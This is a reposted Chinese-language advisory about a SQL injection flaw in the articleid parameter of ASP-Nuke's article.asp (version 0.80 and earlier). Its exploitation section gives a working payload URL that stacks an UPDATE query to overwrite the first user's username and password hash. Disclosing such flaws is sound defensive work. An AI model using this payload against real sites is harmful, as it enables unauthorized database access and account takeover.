ASP-Nuke article.asp articleid变量远程SQL注入漏洞

2011-2-23 9:58:39 来源:网络转载 浏览:149
ASP-Nuke article.asp articleid变量远程SQL注入漏洞
影响版本:
ASP-Nuke <= 0.80

程序介绍:

ASP-Nuke是一款开放源码的软件应用,可在Web Server上运行基于社区的站点。

漏洞分析:

ASP-Nuke处理用户请求时存在输入验证漏洞,远程攻击者可以利用此漏洞非授权访问数据库。
ASP-Nuke的article.asp脚本没有正确过滤articleid参数数据,远程攻击可以在输入中插入特定的SQL语句,从而非授权操作数据库,导致敏感信息泄露或ASP-Nuke被完全控制。

漏洞利用:

http://www.example.com/module/article/article/article.asp?articleid='[SQL_INJECTION] http://www.example.com/module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c' , username='trapset'%20where%20userID=1%20--

解决方案:
厂商补丁:
ASP-Nuke
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.asp-nuke.com/downloads.asp

(0)
(0)